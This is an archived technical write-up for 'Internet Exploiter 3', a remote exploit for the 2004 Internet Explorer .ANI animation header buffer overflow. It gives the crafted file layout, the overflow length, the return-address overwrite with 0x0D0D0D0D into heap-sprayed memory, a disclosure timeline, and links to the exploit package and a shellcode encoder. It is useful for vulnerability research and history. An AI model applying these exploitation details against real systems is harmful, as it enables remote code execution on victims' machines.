Www.edup.tudelft.nl/~bjwever/details msie ani.html.php
From Skypher← Back to www.edup.tudelft.nl/~bjwever/
Internet Exploiter 3: Technical details
A vulnerability in the windows .ANI file handling was found and documented by eEye digital Security. This vulnerability can be triggered remotely through Internet Explorer.
exploits/InternetExploiter3.2.zip consists of InternetExploiter3.2.html and InternetExploiter3.2.ani. The html file contains my standard exploit helper script (see Internet Exploiter 1 documentation) and loads the ani file. The ani file contains the bare minimum an ani file needs to trigger the BoF:
"RIFF" [DWORD:RIFFChunkLength] "ACON" "anih" [DWORD:AnimationHeaderLength] [AnimationHeaderData] "IART" [DWORD:AritistNameLength] [ArtistName]
- RIFFChunkLength is the total size of everything after it.
- AnimationHeaderLength is where the BoF is triggered.
- AnimationHeaderData is the data that is written to the stack.
- ArtistNameLength is the length of the artists's name.
- ArtistName is "SkyLined".
By choosing too high a value for AnimationHeaderLength we can overwrite the stack with information from AnimationHeaderData. In the PoC code I used 0xDC for AnimationHeaderLength to write that many bytes of AnimationHeaderData to the stack. AnimationHeaderData contained a string of bytes with value 0x0D. This will overwrite the saved return address on the stack with 0x0D0D0D0D. Returning into the heap-blocks created by the script in the html file.
|2004-11-01||Patch released by Microsoft.|
|2004-11-01||Advisory released by eEye.|
|2004-12-01||Exploit v0.2 released.|
Available from the Microsoft Corporation website.
- Internet Exploiter 3: Remote exploit for Internet Explorer .ANI file Animation Header Length BoF vulnerability.
- Beta shellcode encoder: Documentation.
- beta.c C Source file for the current version of beta shellcode encoder.
- eEye: Windows ANI File Parsing Buffer Overflow.
- Secunia: Microsoft Internet Explorer Multiple Vulnerabilities.
- Microsoft Corporation website: Vulnerability in Cursor and Icon Format Handling Could Allow Remote Code Execution (891711).